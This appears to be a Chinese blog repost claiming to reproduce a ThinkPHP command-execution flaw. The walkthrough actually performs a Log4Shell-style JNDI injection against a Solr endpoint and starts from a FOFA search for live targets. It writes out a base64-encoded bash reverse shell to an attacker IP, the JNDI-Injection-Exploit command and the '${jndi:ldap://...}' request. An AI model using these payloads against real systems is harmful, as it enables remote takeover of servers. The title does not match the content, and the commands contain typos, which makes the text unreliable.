当前位置: 首页 > news >正文

thinkphp之命令执行漏洞复现

实战:

fofa搜索thinkphp--

第一步:先在dns平台上,点击Get SubDomain ,监控我们的注入效果

 

491f8115d0a117f057b0c64371d55fdf.png

 

4fbd04803681a3aa4a9f8affb3372fd4.png

返回dnslog查看到了Java的版本信息

 

125111dfdd47d12025e5a64204a2638c.png

打开kali监听端口

 

26b906f58698724f2e13893afa9fde2d.png

进行base64编码

bash -i >& /dev/tcp/192.168.189.150/8080 0>&1

我编码后的是

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4OS4xNTAvODA4MCAwPiYx

1151889eaa918292a9f3aa94ceceb5b0.png

复制语句、

# 命令模板
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,[经过base64编码后的命令1}|{base64,-d}|bash"-A 你的ypsipl
#我的命令语句是
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C"bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4OS4xNTAvODA4MCAwPiYx}|{base64,-d}|bash" -A 192.168.189.150
​

bd271b1714b5901586ba905a7582c18f.png

访问一下kali里面得到的1.8版本的ldmp:/solr/admin/cores?action=${jndi:ldap://192.168.189.150:1389/jj9zyn
}

kali里面就可以监听的到了

 

http://www.lryc.cn/news/417426.html

相关文章:

  • 算法板子:匈牙利算法——二分图的最大匹配
  • 轻松拯救数据危机!四大必备的数据恢复软件免费版推荐!
  • windbg常用命令
  • Ubuntu(20.04 LTS)更换镜像源
  • golang使用 copier对象复制时进行类型转化
  • 英特尔18A制程技术分析解读
  • 【百度面试算法题】2024-08-02
  • OSPF基础
  • leetcode 958.二叉树的完全性检验
  • Spring 中请求作用域的数据存储在 ThreadLocal 中还是 Spring 容器中?
  • 基础岛 - 8G显存验证书生·浦语大模型的Demo
  • Jangow靶机攻略
  • Vue项目通过宝塔部署之后,页面刷新后浏览器404页面
  • Java一一一简易图书管理系统
  • Ubuntu配置carla docker环境
  • 超越sd3!比肩Midjourney-v6?AI绘画大模型FLUX1.0详细评测与本地部署方法(附安装文件)
  • 帆软填报报表单元格根据其它单元格内容决定另外的单元格可筛选什么值
  • 一键浪漫的回忆:微软开源的修复工具!!【送源码】
  • 力扣-240.搜索二维矩阵(2)
  • Python推导式和生成器表达式
  • 比较支持向量机、AdaBoost、逻辑斯谛回归模型的学习策略与算法
  • Android顶部标题栏自定义,添加按钮
  • Spring Boot 整合 Dubbo3 + Nacos 2.4.0【进阶】+ 踩坑记录
  • 浙江省食品安全管理员题库及答案
  • C++ 几何算法 - 求两条直线交点
  • Linux操作系统简介
  • 【Python机器学习】回归——缩减系数来“理解”数据
  • 组件设计原则
  • 简单搭建vue项目
  • ctfhub Bypass disable_function